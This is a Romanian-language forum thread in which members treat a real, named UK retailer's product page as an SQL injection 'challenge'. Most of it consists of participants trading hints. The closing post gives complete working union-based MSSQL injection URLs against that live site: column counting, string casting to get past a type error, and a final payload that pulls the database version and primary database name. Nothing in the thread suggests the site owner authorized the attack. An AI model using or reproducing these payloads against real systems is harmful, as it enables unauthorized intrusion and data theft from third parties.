Active Members dancezar Posted April 27, 2014 Active Members Report Share Posted April 27, 2014 (edited) Target: xxx.bellmanandflint.co.uk/product_details.aspx?product_id=1900Cerinte :- Folositi doar Union Based NU ERROR BASED NU STACKED QUERY- Scoateti versiunea impreuna cu nickul vostru ,baza de date principala si username-ul- Trimiteti prin pm sintaxaSolveri:-denjacker-askwrite-BitMap Edited May 11, 2014 by danyweb09 Quote Link to comment Share on other sites More sharing options...
ForTestingPurposes Posted April 29, 2014 Report Share Posted April 29, 2014 De 2 zile m-am apucat si eu de tutoriale SQLi si pe acest site deci pur si simplu nu vrea sa mearga... hmm Deci am aflat nr. de coloane: 9, dar cand dau sa le afisez nu-mi afiseaza nimic pe ecran, nici un numar/text si functia version() nu o recunoaste deci ma gandesc ca e mai invechit serverul mysql deci am incercat @@version si nu da eroare dar nu afiseaza.Ceva hint-uri pentru un newbie? Quote Link to comment Share on other sites More sharing options...
Stealth Posted April 29, 2014 Report Share Posted April 29, 2014 De 2 zile m-am apucat si eu de tutoriale SQLi si pe acest site deci pur si simplu nu vrea sa mearga... hmm Deci am aflat nr. de coloane: 9, dar cand dau sa le afisez nu-mi afiseaza nimic pe ecran, nici un numar/text si functia version() nu o recunoaste deci ma gandesc ca e mai invechit serverul mysql deci am incercat @@version si nu da eroare dar nu afiseaza.Ceva hint-uri pentru un newbie?Nu e MySQL tipul bazei de date ?i nu este un server. Quote Link to comment Share on other sites More sharing options...
ForTestingPurposes Posted April 29, 2014 Report Share Posted April 29, 2014 Nu e MySQL tipul bazei de date ?i nu este un server.SQL Windows*, my bad ( 2nd: un sistem de gestionare de baze de date rela?ionale). Quote Link to comment Share on other sites More sharing options...
ForTestingPurposes Posted April 30, 2014 Report Share Posted April 30, 2014 Ceva hint-uri pentru un newbie?Cineva? Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted April 30, 2014 Author Active Members Report Share Posted April 30, 2014 Cineva? MSSQL ,union basedu pe care il stie toata lumea cu un mic trick la partea de tip de date(INT/STRING) .Eroarea spune totulUnable to cast object of type 'System.Int32' to type 'System.String'.Programatori stiu ce inseamna asta;) Quote Link to comment Share on other sites More sharing options...
ForTestingPurposes Posted April 30, 2014 Report Share Posted April 30, 2014 (edited) MSSQL ,union basedu pe care il stie toata lumea cu un mic trick la partea de tip de date(INT/STRING) .Eroarea spune totulUnable to cast object of type 'System.Int32' to type 'System.String'.Programatori stiu ce inseamna asta;)Stiu, am incercat din prima cu .ToString() .tostring() si alte functii dar nu merg... probabil e prea veche versiunea si nu gasesc alte functii :? probabil trebuie criptat in hexa sau altceva? mai multe indicatii ? mersi in avans L.E: Gata, m-am prins voi posta curand printL.E2: Deocamdata doar versiunea : Edited April 30, 2014 by ForTestingPurposes Quote Link to comment Share on other sites More sharing options...
denjacker Posted May 1, 2014 Report Share Posted May 1, 2014 Quote Link to comment Share on other sites More sharing options...
BitMap Posted May 11, 2014 Report Share Posted May 11, 2014 Foarte bune eroriile astea din .net: source error, stack trace... tot ce iti trebuie pentru 'development' Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted May 11, 2014 Author Active Members Report Share Posted May 11, 2014 ClosedFelicitari celor care au reusit sa il rezolve!In primul rand este de tip StringBellman & Flint - Product DetailsBellman & Flint - Product DetailsNumaratul coloanelor se face exact ca la Mysqlhttp://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 order by 1--Si in total sunt 9 coloane apoi ca sa treceti de eroarea "Unable to cast object of type 'System.Int32' to type 'System.String'." care apare mai joshttp://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select 1,2,3,4,5,6,7,8,9--Trebuie sa transformam coloanele in string pentru ca sunt numere....http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select '1','2','3','4','5','6','7','8','9'--Pentru a extrage versiunea si Nick-ul vostru spre exemplu folosim + intre expresiihttp://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27%20union%20select%20%271%27,%272%27,@@version%2b%27:salut%27,%274%27,%275%27,%276%27,%277%27,%278%27,%279%27--In final asta e sintaxa :http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27%20union%20select%20%271%27,%272%27,%27Nick:danyweb09%27%2bchar%2860%29%2bchar%2898%29%2bchar%28114%29%2bchar%2862%29%2b%27Version:%27%2b@@version%2bchar%2860%29%2bchar%2898%29%2bchar%28114%29%2bchar%2862%29%2b%27First%20database:%27%2bdb_name%280%29,%274%27,%275%27,%276%27,%277%27,%278%27,%279%27-- Quote Link to comment Share on other sites More sharing options...
